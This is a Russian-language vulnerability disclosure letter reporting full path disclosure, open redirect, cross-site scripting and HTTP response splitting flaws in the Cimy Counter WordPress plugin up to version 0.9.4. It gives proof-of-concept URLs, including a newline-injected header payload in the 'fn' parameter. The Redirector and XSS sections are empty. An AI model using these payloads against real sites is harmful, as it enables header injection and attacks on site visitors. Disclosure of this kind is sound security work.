Здравствуйте 3APA3A!
Сообщаю вам о найденных мною Full path disclosure, Redirector, Cross-Site Scripting
и HTTP Response Spitting уязвимостях в плагине Cimy Counter для WordPress.
Full path disclosure:
http://site/wp-content/plugins/cimy-counter/cimy_counter.php
http://site/wp-content/plugins/cimy-counter/cc_redirect.php?cc=Downloads&fn=%0A1
Redirector:
XSS:
HTTP Response Spitting:
http://site/wp-content/plugins/cimy-counter/cc_redirect.php?cc=TestCounter&fn=%0AHeader:test
Работает в старых версиях PHP.
Уязвимы Cimy Counter 0.9.4 и предыдущие версии. В версии Cimy Counter 0.9.5 автор
исправил все указанные уязвимости кроме Redirector.
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4170/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua